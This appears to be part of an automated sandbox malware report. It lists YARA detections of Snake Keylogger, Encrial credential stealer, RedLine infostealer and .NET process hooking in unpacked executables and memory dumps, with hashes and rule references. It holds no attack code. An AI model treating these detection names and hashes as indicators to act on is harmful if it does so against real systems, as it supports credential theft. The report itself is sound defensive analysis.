                      Source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 17.2.lVbhkOPdhyxT.exe.17a46b8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
